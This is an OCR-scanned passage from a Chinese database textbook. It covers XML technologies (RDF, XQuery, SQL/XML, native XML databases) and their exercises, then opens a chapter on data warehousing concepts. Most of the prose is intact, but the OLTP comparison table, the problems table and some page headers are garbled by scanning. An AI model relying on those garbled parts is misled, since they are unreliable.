本 身 是 一 个 XML 文档 ， 所 以 也 可 以 用 它 所 描述 的 文档 的 阅读 工具 来 阅读 它 。 

资源 描述 框架 ( Resource Description Framework，RDF ) 是 结构 化 元 数据 编码 、 交 换 和 重用 的 基础 
设施 。 它 通过 设计 支持 公共 的 语法 、 语 义 和 结 构 的 机 制 来 支持 元 数据 的 互 操 作 性 。RDF 并 不 规定 每 
一 个 关注 领域 的 语义 ， 却 提供 为 这 些 领 域 定义 所 需 的 元 数据 元 素 的 能 力 。RDF 将 XML 作为 交换 和 
处 理 元 数据 的 公共 语法 。 

W3C 查询 工作 组 推荐 了 一 个 XML 查询 语言 ， 称 为 XQuery。XQuery 是 一 种 函数 型 语言 ， 其 中 查询 
被 表示 为 表达 式 。 表 达 式 的 值 总 是 由 一 个 或 多 个 原子 值 (atomic value) 或 结 点 (node) 组 成 的 有 序 
序列 。XQuery 支持 几 类 表达 式 ， 这 些 表 达 式 可 以 嵌 套 (支持 子 查询 的 概念 )。 

FLWOR ( 读 作 “flower”) 表达 式 由 FOR、LET、WHERE、ORDER BY 和 RETURN 子 句 构 成 。 
FLWOR 表达 式 以 一 个 或 多 个 任意 顺序 的 FOR 和 LET 子 句 开 始 ， 后 接 一 个 可 选 的 WHERE 子 句 ， 
一 个 可 选 的 ORDER BY 子 句 和 一 个 必需 的 RETURN 子 句 。 在 SQL 查询 中 ， 这 些 子 句 必须 按 序 出 
现 。FLWOR 表达 式 绑 定 值 到 一 个 或 多 个 变量 ， 然 后 利用 这 些 变量 来 构造 结果 。 


338 锚 八 序 分 Web 与 DBMS 


XML XQuery 1.0 和 XPath 2.0 Data Model 定义 了 包含 在 XSLT 和 XQuery 处 理 器 的 输入 中 的 信息 ， 
以 及 XSLT、XQuery 和 XPath 语言 的 表达 式 允 许 的 值 。 该 Data Model 基于 XML Information Set， 
能 支持 XML Schema 类 型 ， 能 支持 文档 集合 及 简单 与 复杂 值 的 描述 。Data Model 的 一 个 实例 表示 一 
个 或 多 个 复杂 的 XML 文档 或 文档 部 分 ， 每 个 由 其 自己 的 结 点 树 描述 。 在 Data Model 中 ,每 个 值 是 
零 个 或 多 个 项 目的 有 序 序列 ， 这 里 每 个 项 目 可 以 是 一 个 原子 值 或 结 点 。 

作为 XQuery 定义 的 一 部 分 ，W3C 工作 组 曾 提出 过 一 个 文档 ， 它 形式 化 地 规定 了 XQuery/XPath 语 
言 的 语义 。 正 如 作者 所 述 , “形式 化 语义 的 目的 是 ， 通 过 利用 严格 的 数学 定义 表达 式 的 内 涵 ， 来 完 
善 XQuery/XPath 语言 规范 。 严 格 的 形式 化 语义 阐明 了 英文 规范 的 本 来 意图 ， 保 证 没有 漏 掉 一 些 边 
角 情 况 ， 并 且 为 实现 提供 了 参考 ” 。 这 样 一 来 ， 文 档 为 实现 者 提供 了 一 个 处 理 模 型 和 一 套 语言 静态 
语义 与 动态 语义 的 完整 描述 。 

有 四 种 一 般 的 方法 用 来 在 关系 数据 库 中 存储 XML 文档 : 将 XML 作为 一 个 元 组 中 某 个 属性 的 值 存 
储 ; 以 碎片 的 形式 跨 多 个 属性 和 关系 存储 XML ; 以 模式 无 关 的 形式 存储 XML ; 以 分 析 所 得 形式 存 
储 XML， 也 即 ， 将 XML 转换 成 内 部 格式 ， 例 如 Infoset 或 者 PSVI 表 示 ， 然 后 存储 该 表示 。 
SQL:2011 标准 定义 了 SQL 的 扩展 以 发 布 XML， 参 见 SQL/XML 。 特别 地 ，SQL/XML 包含 : 一 
个 新 的 纯 XML 数据 类 型 XML， 它 使 得 XML 文档 能 被 看 作 关系 表 中 列 的 值 、 用 户 自 定义 类 型 的 属 
性 、 变 量 和 函数 参数 ; 该 类 型 的 一 组 操作 符 ; 从 关系 数据 到 XML 的 一 套 隐 含 的 映射 。 

纯 XML 数据 库 (native XML database) 给 XML 文档 (相对 于 文档 中 的 数据 ) 定义 了 一 个 逻辑) 数 
据 模型 ， 并 可 根据 该 模型 存储 和 检索 文档 。 该 模型 至 少 包括 元 素 、 属 性 、PCDATA 和 文档 顺序 等 概 
念 。XML 文档 必须 作为 (逻辑 ) 存储 的 单元 ， 尽 管 并 不 约束 底层 物理 存储 模型 (因此 传统 的 DBMS 
并 不 排除 在 外 ， 但 没有 一 个 是 像 索引 和 压缩 文件 那样 专 有 的 存储 格式 )。 


思考 题 


30.1 


30:2 
30.3 
30.4 
30.5 
30.6 


30.7 


什么 是 半 结 构 化 数据 ? 讨论 结构 化 、 半 结构 化 和 结构 化 数据 之 间 的 差别 。 给 出 实例 以 说 明 你 的 


答案 。 

请 描述 对 象 交换 模型 (OEM) 的 关键 特性 。 

XML 是 什么 ?如何 将 XML 与 SGML 和 HTML 进行 比较 ? 
XML 的 优点 有 哪些 ? 

说 明 合式 XML 文档 和 合法 XML 文档 的 区 别 。 

请 简要 描述 以 下 技术 : 

(a) DOM 和 SAX 

(b) 命名 空间 

(c) XSL 和 XSLT 

(d) XPath 

(e) XPointer 

(f) XLink 

(g) XHTML 

(h) SOAP 

(i) WSDL 

(j) UDDI 

请 描述 文档 对 象 模型 (DOM) 和 对 象 交换 模型 (OEM) 的 区 别 ? 
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30.8 ”描述 文档 类 型 定义 (DTD) 和 XML Schema 之 间 的 区 别 ? 

30.9 讨论 组 合 XML 和 XML Schema 怎么 不 可 能 提供 我 们 所 需 的 语义 互 操作 性 ， 以 及 关于 RDF 和 
RDF 模式 的 建议 为 什么 就 更 合适 。 

30.10 ”请 简要 描述 XQuery 的 W3C 提议 和 该 语言 的 规范 。 

30.11 什么 是 路 径 表 达 式 ? 

30.12 ”什么 是 FLWOR 表达 式 ? 

30.13 ”静态 类 型 和 动态 计 值 的 目标 是 什么 ? 

30.14 简要 描述 SQL:2011 SQL/XML 的 功能 。 

30.15 ”讨论 XML 如 何 转换 到 数据 库 。 

30.16 ”什么 是 纯 XML 数据 库 ? 


习题 

30.17 为 图 4.3 中 描述 的 每 个 关系 创建 一 个 XML 文档 。 

30.18 ”对 于 图 30-17 中 创建 的 XML 文档 ， 创 建 样式 表单 并 在 浏览 器 中 显示 该 文档 。 

30.19 ”对 上 面 创建 的 每 一 个 文档 ， 为 它们 分 别 创 建 合适 的 DTD 和 XML Schema， 必 要 时 使 用 命名 空 
间 来 重用 公共 的 声明 。 可 能 时 ， 为 多 样 性 、 主 关键 字 和 外 部 关键 字 以 及 辅 关键 字 建 模 。 完 成 这 
些 工 作 后 得 出 什么 结论 ? 

30.20 在 例 30.8 中 为 图 30-22a 的 XML 文档 创建 了 XML 查询 数据 模型 。 现 在 请 为 图 30-22b 中 相应 
的 XML Schema 创建 XML 查询 数据 模型 。 

30.21 为 以 上 创建 的 每 个 XML 文档 创建 一 个 XML 查询 数据 模型 。 

30.22 为 第 4 章 后 面 的 习题 中 给 出 的 Hotel 模式 创建 一 个 XML 文档 和 XML Schema。 然 后 试 着 为 习 
题 6.7-6.26 写 出 XQuery 表达 式 。 

30.23 ”为 第 $ 章 后 面 的 习题 中 给 出 的 Projects 模式 创建 一 个 XML 文档 和 XML Schema。 然 后 试 着 为 习 
题 6.32-6.40 写 出 XQuery 表达 式 。 

30.24 ”为 第 5 章 后 面 的 习题 中 给 出 的 Library 模式 创建 一 个 XML 文档 和 XML Schema。 然 后 试 着 为 习题 
6.41-6.54 写 出 XQuery 表达 式 。 

30.25 ”针对 你 曾经 访问 过 的 任何 DBMS， 考 察 其 对 XML 功能 的 支持 。 

30.26 ”对 任何 支持 XML 的 DBMS， 将 习题 30.17 创建 的 XML 文档 转换 到 数据 库 。 检 查 所 创建 关系 的 结构 。 
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第 31 章 数据 仓库 的 概念 
第 32 章 数据 仓库 的 设计 
第 33 章 OLAP 
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数据 仓库 的 概念 





| 本 章 目标 
本 章 我 们 主要 学 习 : 
数据 仓库 的 演化 过 程 
数据 仓库 的 主要 概念 与 优势 
数据 仓库 与 联机 事务 处 理 (OLTP) 系统 的 区 别 
数据 仓库 的 相关 问题 
数据 仓库 的 体系 结构 与 主要 组 成 部 分 
数据 仓库 的 主要 工具 与 技术 
数据 仓库 集成 的 相关 问题 和 元 数据 管理 的 重要 性 
数据 集 市 的 概念 与 实现 数据 集 市 的 主要 原因 
Oracle 如 何 支 持 数据 仓库 


在 现代 商业 中 ， 随 着 计算 、 自 动 化 和 各 种 技术 的 标准 化 ， 有 可 能 获取 大 量 的 电子 数据 。 
各 业务 领域 转 而 正视 这 大 量 的 数据 ， 试 图 提取 它们 所 运营 环境 的 信息 。 这 种 趋势 导致 了 商 
务 智能 ( Business Intelligence，BI) 领域 的 出 现 。BI 是 一 个 宽泛 的 术语 ， 涵 盖 收 集 和 分 析 数 
据 的 过 程 ， 在 这 些 过 程 中 使 用 的 技术 ， 以 及 从 这 些 过 程 获得 的 、 帮 助 公司 进行 决策 的 信息 。 
本 章 和 后 续 几 章 将 集中 于 介绍 形成 BI 实现 部 分 的 各 个 关键 技术 : 数据 仓库 、 联 机 分 析 处 理 
(OLAP)、 数 据 挖掘 。 


| 本 章 结构 

31.1 节 概 述 数据 仓库 的 演化 过 程 ， 并 描述 数据 仓库 的 潜在 优势 及 与 其 相关 的 一 些 主要 问 
题 。31.2 节 讨 论 数 据 仓库 的 体系 结构 和 主要 组 成 部 分 。31.3 节 给 出 数据 仓库 的 相关 工具 与 技 
术 。31.4 节 介 绍 数据 集 市 及 其 优势 。31.5 节 展 示 了 Oracle 对 数据 仓库 的 支持 。 本 章 的 例子 
取 自 第 11 章 和 附录 A 中 的 DreamHome 案例 。 


31.1 数据 仓库 引言 


数据 仓库 概念 很 显然 已 被 人 们 接受 ， 对 许多 组 织 机 构 来 说 ， 它 再 也 不 是 数据 “军械 库 ” 
中 一 个 可 选 的 部 分 。 数 据 仓 库 将 成 为 一 个 永久 性 设施 的 证 据 是 ， 目 前 各 数据 库 厂 商都 将 构建 
数据 仓库 的 能 力作 为 其 数据 库 产品 的 核心 服务 。 

不 仅 数据 仓库 的 大 小 和 流行 程度 在 增长 ， 而 且 这 种 系统 的 范围 和 复杂 性 也 在 扩大 。 当 
前 的 数据 仓库 系统 不 仅 期 望 支 持 传统 的 报表 ， 还 希望 提供 更 多 的 高 级 分 析 ， 如 多 维和 预测 分 
析 ， 并且 分 析 的 范围 还 要 满足 不 断 增长 的 、 不 同类 型 的 用 户 的 需求 。 数 据 仓库 资源 期 望 不 仅 
对 越 来 越 多 的 内 部 用 户 可 用 ， 企 业 外 部 的 客户 和 供应 商 最 好 也 可 访问 或 使 用 。 数 据 仓 库 的 日 
益 普及 被 认为 是 由 一 系列 因素 导致 的 ， 例 如 ， 政 府 法 规 要 求 企业 维护 事务 历史 记录 ， 以 及 更 
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便宜 可 靠 的 数据 存储 设施 的 出 现 ， 这 也 使 得 实时 ( RT) 数据 仓库 的 出 现成 为 可 能 ， 从 而 满足 
那些 时 间 关 键 的 商务 智能 应 用 。 

在 本 节 中 ， 我们 将 讨论 数据 仓库 的 起 源 和 演化 、 主 要 优点 及 数据 仓库 相关 的 问题 。 接 
着 ,我 们 讨论 数据 仓库 与 OLTP 系统 的 联系 ， 后 者 是 数据 仓库 的 主要 数据 来 源 。 我 们 着 重 比 
较 和 对 比 这 些 系统 的 主要 特点 。 然 后 ， 我 们 分 析 开 发 和 管理 数据 仓库 的 有 关 问 题 。 最 后 展望 
RT 数据 仓库 的 发 展 趋势 以 及 与 此 趋势 相关 的 主要 问题 。 


31.1.1 数据 仓库 演化 过 程 


自 20 世纪 70 年 代 以 来 ， 很 多 组 织 机 构 都 将 投资 集中 在 新 型 的 业务 流程 自动 化 系统 上 。 
希望 能 够 通过 为 顾客 提供 更 加 高 效 和 经 济 的 服务 ， 使 单位 更 具 竞 争 优势 。 这 期 间 ， 组 织 机 构 
积累 了 大 量 并 且 还 在 不 断 增长 的 数据 ， 存 储 在 其 运营 数据 库 中 。 近 年 来 ， 当 这 样 的 系统 已 经 
变 得 相当 普遍 ， 组 织 机 构 又 开始 将 目光 转向 利用 运营 数据 进行 决策 分 析 ， 以 求 更 具 竞 争 力 。 

过 去 设计 与 开发 运营 型 系统 时 没有 考虑 到 决策 分 析 的 需求 ， 因 此 在 这 类 系统 上 进行 决策 
分 析 并 不 容易 。 通 常 的 情形 是 ， 一 个 组 织 机 构 可 能 拥有 多 个 运营 型 系统 ， 里 面 存在 一 些 重合 
甚至 相悖 的 定义 ， 例 如 数据 类 型 。 因 此 ， 需 要 把 这 些 数 据 文档 转换 成 知识 源 ， 给 用 户 提供 一 
个 单一 完整 的 数据 视图 。 数 据 仓 库 的 概念 似乎 能 满足 这 样 的 需求 ， 即 从 多 个 运营 数据 源 中 获 
取 数 据 ， 供 决策 分 析 使 用 。 


31.1.2 ”数据 仓库 概念 简介 


数据 仓库 的 概念 最 早 是 由 IBM 以 “信息 仓库 ”的 形式 ， 作 为 访问 非 关 系 型 系统 中 数据 
的 一 种 解决 方案 提出 的 。 信 息 仓库 的 设计 目的 是 用 于 帮助 组 织 机 构 使 用 数据 文档 以 获取 商业 
利益 。 然 而 ， 由 于 一 些 与 实现 相关 的 复杂 性 和 性 能 上 的 原因 ， 创 建 这 种 信息 仓库 的 设想 并 没 
有 成 功 。 从 那 时 开始 ， 数 据 仓库 的 概念 曾 几 次 引起 关注 ,但 直到 近 几 年 才 被 认可 为 有 价值 、 
可 行 的 方案 。 数 据 仓 库 最 早 的 倡导 者 是 Bill Inmon， 他 被 称 为 “数据 仓库 之 父 ”。 


| 数据 仓库 | 用 于 管理 决策 支持 过 程 的 、 面 向 主体 的 、 集 成 的 、 时 变 的 、 非 易 失 的 数据 集合 。 


按照 Inmon ( 1993 ) 给 出 的 这 个 定义 ， 数 据 须 是 : 

e 面向 主体 的 。 数 据 仓 库 是 围绕 企业 的 主要 主体 (比如 顾客 、 产 品 、 销 售 等 ) 而 不 是 主 
要 应 用 领域 (比如 货品 计价 、 股 票 控制 、 产 品 销售 等 ) 进行 组 织 的 。 这 是 因为 数据 仓 
库 中 存储 的 是 用 于 决策 分 析 的 数据 而 不 是 面向 应 用 的 数据 。 

e 集成 的 。 数 据 仓 库 的 数据 来 源 于 企业 范围 内 各 种 不 同 的 应 用 程序 系统 。 源 数据 经 常 
会 有 不 一 致 ， 比 如 使 用 不 同 的 格式 。 集 成 后 的 数据 源 必须 协调 一 致 ， 给 用 户 提供 一 
个 统一 的 数据 视图 。 

e 时 变 的 。 因 为 数据 仓库 中 的 数据 只 在 某 个 时 间 点 或 某 段 时 间 间 隔 内 为 精确 和 有 效 的 。 
数据 仓库 的 时 变性 用 数据 成 立 的 延展 时 间 、 数 据 与 时 间 的 显 式 或 隐 式 关联 以 及 数据 
仅 表 示 一 系列 快照 的 事实 也 都 能 说 明 。 

e 非 易 失 的 。 由 于 数据 并 不 进行 实时 更 新 ， 而 是 定期 从 运营 型 系统 中 刷新 。 新 的 数据 
一 般 加 入 数据 库 作 为 数据 仓库 的 补充 ， 而 不 是 取代 。 数 据 仓 库 不 断 吸收 新 数据 ， 并 
与 原来 数据 进行 增 量 式 集 成 。 

目前 数据 仓库 有 许多 种 定义 ， 早 期 的 定义 集中 在 数据 仓库 所 保存 数据 的 特性 上 。 目 前 还 
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有 一 些 定义 扩展 了 它 ， 将 从 数据 源 中 访问 数据 并 传送 数据 给 决策 者 的 相关 处 理 也 包含 了 进来 
(Anahory and Murray, 1997 ) 。 

无 论 如 何 定义 ,数据 仓库 的 最 终 目 标 是 将 整个 企业 的 数据 集成 到 一 个 单一 的 存储 中 ， 在 
这 里 用 户 可 以 方便 地 进行 查询 、 产 生 报 表 、 进 行 分 析 。 


31.1.3 ”数据 仓库 的 优势 


数据 仓库 的 成 功 实现 可 以 为 一 个 组 织 机 构 带 来 以 下 优势 : 

@ 潜在 的 高 投资 回报 率 。 组 织 机 构 必 须 投 入 大 量 的 资源 来 确保 数据 仓库 的 成 功 实 现 ， 
其 花 销 随 着 具体 可 采用 的 技术 方案 不 同 ， 从 几 万 到 几 百 万 美元 不 等 。 然 而 ，IDC 
(International Data Corporation， 国 际 数据 公司 ) 在 1996 年 的 调查 表明 ， 数 据 仓库 项 
目 平 均 每 三 年 的 投资 回报 (ROI) 达到 了 401% (IDG，1996 )。 该 公司 后 来 对 业务 分 
析 行 业 ， 也 就 是 访问 数据 仓库 的 那些 分 析 工 具 的 调查 表明 ， 它 们 平均 一 年 的 ROI 达 
到 了 431% (IDG，2002 ) 。 

e 竞争 优势 。 成 功 实现 数据 仓库 产生 的 巨大 投资 回报 ， 也 是 数据 仓库 增强 竞争 优势 的 
有 力 证 据 。 能 够 获得 这 样 的 竞争 优势 主要 是 因为 决策 者 可 以 访问 过 去 不 可 得 的 、 未 
知 的 和 未 被 使 用 的 有 关 客 户 、 发 展 趋势 和 业务 需求 等 方面 的 信息 。 

@ 企业 决策 者 不 断 增长 的 生产 力 。 数 据 仓 库 通 过 创建 一 个 一 致 的 、 面 向 主体 的 、 包 含 
历史 数据 的 集成 数据 库 ， 提 高 了 企业 决策 者 的 生产 力 。 它 从 多 个 不 兼容 系统 中 集成 
数据 ， 形 成 了 整个 组 织 机 构 一 致 的 视图 。 通 过 将 数据 转变 为 有 意义 的 信息 ， 数 据 仓 
库 使 得 企业 决策 者 可 以 进行 更 真实 、 更 精确 和 更 一 致 的 分 析 。 


31.1.4 ”联机 事务 处 理 系 统 与 数据 仓库 的 比较 


由 于 需求 不 一 样 ， 为 联机 事务 处 理 ( Online Transaction Processing，OLTP) 建立 的 数据 
库 管 理 系 统 ( DBMS) 对 于 数据 仓库 来 说 是 不 合适 的 。 例 如 ，OLTP 系统 旨 在 使 事务 处 理 能 
力 最 强 ， 而 数据 仓库 主要 用 来 支持 即席 (ad hoc) 查询 处 理 。 表 31-1 给 出 了 OLTP 系统 和 数 
据 仓 库 系 统 主要 特性 的 比较 (Singh，1997 ) 。 


表 31-1 OLTP 系统 和 数据 仓库 系统 的 比较 


CE ET 
主要 用 途 。 | ”支持 运 维 处 理 支持 分 析 处 理 
数据 年 代 历史 〈 但 趋势 是 也 包括 当前 数据 ) 
数据 延迟 依赖 于 为 仓库 补充 数据 周期 的 长 度 (但 趋势 是 实时 补充 ) 
数据 粒度 。 | ”细节 数据 细节 数据 、 轻 度 汇总 和 重度 汇总 数据 
数据 插入 、 删 除 、 更 新 和 查询 模 | 。、 
业 卫 允 守 ”| 证 全。 查询 模式 不 可 预知 ， 事 务 乔 吐 量 中 到 低 
报表 可 预知 的 一 维 相对 静态 的 固定 报表 | ”不 可 预知 的 多 维 动态 报表 
a 和 (但 趋势 是 也 要 支持 运营 用 户 的 


表 31-1 提供 了 OLTP 系统 与 数据 仓库 系统 主要 特征 的 比较 。 该 表 还 指出 了 一 些 主 要 
趋势 ， 它 们 可 能 改变 数据 仓库 的 特征 。 一 个 明显 的 趋势 是 朝向 RT 数据 仓库 发 展 ， 这 将 在 
31.1.6 节 讨 论 。 


甸 31 划 数据 份 庆 的 规 念 345 


一 个 组 织 机 构 通常 可 能 会 有 多 个 不 同 的 OLTP 系统 进行 各 项 业务 处 理 ， 比 如 库存 控 
制 、 给 客户 开发 票 、 销 售 点 等 。 这 些 系统 产生 的 运营 数据 是 细节 的 、 当 前 的 且 不 断 变化 的 。 
OLTP 系统 针对 大 量 可 预见 的 、 重 复 的、 深度 更 新 的 事务 进行 优化 。OLTP 数据 根据 与 业务 
应 用 相关 的 事务 需求 进行 组 织 ， 并 支持 大 量 并 发 运营 用 户 的 日 常 决策 。 

相 比 之 下 ， 一 个 企业 一 般 只 有 一 个 数据 仓库 ， 其 中 的 数据 是 历史 的 、 细 节 的 ， 并 汇总 到 
相应 层次 ， 很 少 变 化 〈 只 补充 新 数据 )。 数 据 仓 库 只 需要 支持 相对 较 少 的 事务 ， 这 些 事务 本 
质 上 是 不 可 预测 的 ， 需 要 回答 的 是 一 些 特定 的 、 无 结构 的 、 启 发 式 的 查询 。 仓 库 数 据 根据 洪 
在 的 查询 进行 组 织 ， 并 且 要 支持 较 少 数 用 户 的 分 析 需 求 。 

尽管 OLTP 系统 和 数据 仓库 有 着 许多 不 同 的 特性 上 且 基 本 构建 思想 不 同 ， 但 是 它们 却 是 紧 
密 联系 的 ， 因 为 OLTP 系统 是 数据 仓库 的 数据 来 源 。 这 种 联系 中 的 主要 问题 在 于 OLTP 系统 
中 保存 的 数据 是 不 一 致 的 、 片 段 的 、 易 变 的 ， 且 存在 重复 和 人 缺 项 的 情况 。 因 此 ， 运 营 数据 在 
用 于 数据 仓库 之 前 必须 先 清洗 ，31.3.1 节 将 讨论 这 个 过 程 。 

OLTP 系统 并 不 是 为 了 快速 回答 即席 查询 ， 也 不 是 为 了 存储 分 析 趋 势 用 的 历史 数据 而 构 
建 。 一 般 地 ，OLTP 提供 了 大 量 的 原始 数据 ， 这 些 数据 不 易 被 分 析 。 数 据 仓库 人 允许 回答 更 复 
杂 的 查询 ， 而 不 仅仅 是 一 些 像 “英国 主要 城市 的 房产 平均 销售 价格 是 多 少 ” 之 类 的 简单 聚 
集 。 数 据 仓库 需 要 回答 的 查询 类 型 可 以 是 相对 简单 的 ， 也 可 以 是 高 度 复杂 的 ， 且 与 终端 用 户 
采用 的 查询 工具 相关 (参见 31.2.10 节 )。DreamHome 数据 仓库 的 查询 范围 示例 如 下 : 

e。 2013 年 第 三 季度 ， 整 个 苏格兰 的 总 收入 是 多 少 ? 

e 2012 年 英国 每 一 类 房产 销售 的 总 收入 为 多 少 ? 

e 2013 年 租借 房产 业务 中 每 个 城市 的 哪 三 个 区 域 最 受 欢 迎 ? 与 过 去 的 两 年 相 比 有 何不 同 ? 

。 每 个 分 店 本 月 的 房产 销售 月 收入 是 多 少 ， 与 刚 过 去 的 12 个 月 进行 比较 怎样 ? 

e 如 果 对 于 10 万 英镑 以 上 的 房产 ， 法 定价 格 上 升 3.5% 而 政府 税收 下 降 1.5%， 对 英国 
不 同 地 区 的 销售 会 产生 什么 影响 ? 

在 英国 主要 城市 中 ， 哪 种 类 型 的 房产 销售 价格 高 于 平均 房产 销售 价格 ? 这 与 人 口 统 
计数 据 有 何 联系 ? 
每 个 分 店 的 年 度 总 收入 与 指派 给 每 个 分 店 的 销售 任务 的 关系 如 何 ? 


31.1.5 ”数据 仓库 的 问题 


与 开发 和 管理 数据 仓库 相关 联 的 问题 列 在 表 31-2 中 表 31-2 数据 仓库 的 问题 


(Greenfield, 1996, 2012 )。 数据 ETL 所 需 资 源 被 低估 
数据 ETL 所 需 资源 被 低估 源 系统 被 隐藏 的 问题 
许多 开发 人 员 低 估 了 抽取 、 转 换 和 装载 (ETL) 数据 到 所 需 数 据 未 能 捕获 

数据 仓库 所 需 的 时 间 。 虽 然 许多 好 的 ETL 工具 最 终 会 减少 


增长 的 终端 用 户 要 求 
这 部 分 工作 所 需 的 时 间 与 精力 ， 但 这 个 过 程 还 是 会 占 整个 SS 
wt 对 
Vo 
数据 所 有 权 问 题 
源 系统 中 被 隐藏 的 问题 ee 
将 数据 从 源 系统 导 人 数据 仓库 时 可 能 会 隐藏 一 些 问题 ， a 
这 些 问题 可 能 在 几 年 之 内 都 不 会 被 发 现 。 开 发 者 必须 决定 ee 


是 在 数据 仓库 还 是 在 源 系统 中 解决 这 些 问 题 。 例 如 ， 输 入 
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新 房产 的 细节 数据 时 ， 因 为 某 些 字段 可 能 允许 为 空 值 ， 这 就 可 能 导致 员工 录 和 人 了 不 完整 的 房 
产 数 据 ， 即 使 数据 本 来 是 可 获得 和 可 使 用 的 。 

所 需 数据 未 能 捕获 

数据 仓库 方案 经 常会 需要 一 些 现 有 源 系 统 没有 捕获 的 数据 。 组 织 机 构 必 须 决 定 是 否 要 对 
OLTP 进行 调整 或 创建 一 个 系统 专门 用 来 捕获 这 些 数 据 。 以 DreamHome 为 例 ， 可 能 想 对 某 
些 事件 进行 分 析 ， 如 在 每 个 分 店 注册 的 新 客户 和 房产 。 然 而 ， 由 于 现 有 系统 没有 捕获 分 析 要 
求 的 数据 ， 比 如 客户 和 房产 的 注册 日 期 ， 所 以 在 当前 不 可 能 进行 这 种 分 析 。 

增长 的 终端 用 户 要 求 

当 终 端 用 户 获 得 查询 与 报表 工具 后 ， 他 们 期 待 信息 系统 提供 支持 的 需求 只 会 增加 不 会 减 
少 ， 因 为 用 户 已 经 不 断 意识 到 数据 仓库 的 强大 功能 与 价值 。 当 然 ， 可 以 通过 购买 易 用 且 功 能 强 
大 的 工具 ， 或 者 给 用 户 进行 更 好 的 培训 来 部 分 解决 这 个 问题 。 要 求 增加 信息 系统 (1S) 员工 的 另 
一 个 原因 是 ,一 旦 数据 仓库 在 线 ， 用 户 和 查询 的 数目 随 之 增长 并 且 要 回答 越 来 越 复 杂 的 查询 。 

数据 同化 

构建 大 规模 数据 仓库 的 过 程 就 是 数据 的 同化 过 程 ， 它 减少 了 数据 本 身 的 价值 。 例 如 ， 为 
组 织 机 构 的 数据 产生 统一 视图 时 ， 数据 仓库 设计 者 会 强调 数据 用 于 不 同 应 用 时 的 相似 性 而 不 
是 差异 性 ， 例 如 房产 销售 和 房产 租赁 。 

对 资源 的 高 需求 

数据 仓库 需要 占用 大 量 的 磁盘 空间 。 用 于 决策 支持 的 关系 数据 库 一 般 都 被 设计 成 星 形 模 
式 、 雪 花 模式 或 星座 模式 (参见 第 32 章 )。 这 种 方法 会 导致 产生 很 大 的 事实 表 。 而 且 如 果 有 
多 个 维度 的 到 事实 数据 ， 则 聚集 表 的 组 合 和 到 事实 表 的 索引 会 占用 比 原始 数据 更 多 的 空间 。 

数据 所 有 权 问 题 

数据 仓库 可 能 会 改变 终端 用 户 对 数据 所 有 权 的 态度 。 一 些 过 去 只 能 被 某 些 专 有 部 门 或 业 
务 领 域 使 用 的 敏感 数据 ， 现 在 可 能 允许 被 组 织 机 构 内 其 他 人 访问 。 

维护 开销 高 

数据 仓库 是 维护 频 度 高 的 系统 。 业 务 过 程 和 源 系 统 的 任何 重组 都 会 影响 数据 仓库 。 为 了 
保持 有 价值 的 资源 ， 数 据 仓库 必须 与 它 所 支持 的 组 织 机 构 保 持 一 致 。 

项 目 周 期 长 

数据 仓库 代表 了 企业 单独 的 数据 资源 。 然 而 ,构建 一 个 数据 仓库 可 能 需要 几 年 的 时 间 ， 
这 也 是 为 什么 一 些 组 织 机 构 要 构建 数据 集 市 的 原因 (参见 31.5 节 )。 数 据 集 市 只 支持 一 些 特 
殊 部 门 或 特殊 功能 领域 的 需求 ， 所 以 构建 起 来 会 比 数据 仓库 快 得 多 。 

集成 复杂 

数据 仓库 管理 中 最 重要 的 方面 是 集成 能 力 。 这 意味 着 数据 仓库 要 花 相 当 一 部 分 时 间 来 决 
定 怎 样 才能 很 好 地 把 多 种 不 同 的 数据 仓库 工具 集成 到 一 起 ， 成 为 一 个 所 需 的 完整 解决 方案 。 
集成 并 非 易 事 ， 因 为 数据 仓库 的 每 一 种 操作 都 存在 若干 工具 ， 只 有 很 好 地 集成 才能 使 数据 仓 
库 为 组 织 机 构 带 来 效益 。 


31.1.6 ”实时 数据 仓库 


最 初 ， 当 数据 仓库 作为 下 一 个 “必须 拥有 ”的 数据 库 出 现在 市 场 上 时 ,很 多 人 都 认为 它 
是 存放 历史 数据 的 系统 。 存 储 的 数据 至 少 应 该 是 一 周 前 的 ， 在 当时 人 们 认为 这 足以 满足 企业 
决策 者 的 需要 。 然 而 ， 从 那 时 起 ， 现 代 企 业 的 日 新 月 异 和 决策 者 对 最 新 数据 的 访问 需求 ， 都 
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要 求 减少 由 一 线 运营 系统 创建 的 数据 到 能 将 其 应 用 于 报表 和 分 析 应 用 中 的 时 间 间 隔 。 

近年 来 ， 数 据 仓 库 技术 已 经 发 展 到 允许 运营 数据 和 仓库 数据 之 间 更 密切 的 同步 ， 这 样 的 

系统 被 称 为 实时 (Real-Time，RT) 或 近 实 时 ( Near-Real Time，NRT) 数据 仓库 。 然 而 ， 试 
图 减少 运营 数据 的 创建 到 将 这 些 数据 放 入 仓库 中 之 间 的 时 间 延 迟 ( 即 数据 等 待 时 间 ) 还 是 对 
数据 仓库 技术 提出 了 额外 的 要 求 。Langseth 给 出 了 RT/NRT 数据 仓库 开发 者 所 面临 的 主要 问 
题 (2004 年 )， 包 括 : 

@ 使 RIINRT 能 提取 、 转 换 和 加 载 (ETL) 源 数据 。RT 数据 仓库 的 问题 是 要 减 小 ETL 
窗口 ，RT/NRT 上 载 数 据 时 数据 仓库 用 户 不 用 下 线 或 很 短暂 下 线 。 

e 建 模 RT 事实 表 。 在 仓库 中 建 模 RT 数据 的 问题 是 如 何 将 RT 数据 与 已 经 在 仓库 里 的 
其 他 各 种 汇总 数据 整合 。 

@ OLAP 查询 与 不 断 变 化 的 数据 。OLAP 工具 假定 被 查询 的 数据 是 静态 、 不 变 的 。 对 于 
查询 过 程 中 又 有 新 数据 补充 到 目标 数据 的 情形 ， 该 工具 设 有 相应 的 协议 可 进行 处 理 。 
OLAP 将 在 第 33 章 详细 讨论 。 

e@ 可 伸缩 性 和 查询 竞争 。 可 扩展 性 和 查询 竞争 本 来 就 是 把 运营 系统 与 分 析 系统 分 离 的 
主要 原因 之 一 ， 因 此 ， 任 何 把 该 问题 带 回 仓 库 环 境 的 因素 都 不 容易 调和 。 

RT/NRT 数据 仓库 面临 问题 的 完整 描述 和 讨论 ， 以 及 可 能 的 解决 方案 在 Langseth ( 2004 ) 

中 给 出 。 


31.2 ”数据 仓库 体系 结构 


本 节 将 概述 数据 仓库 的 体系 结构 和 主要 组 成 部 分 。 数 据 仓库 的 主要 过 程 、 工 具 和 技术 将 
在 本 章 后 续 各 节 中 详细 描述 。 数 据 仓库 的 典型 结构 如 图 31-1 所 示 。 









~ 


传统 的 报表 、 查 询 
和 应 用 开发 工具 


数 挖掘 
终端 用 户 访问 工具 


存档 /备份 数据 
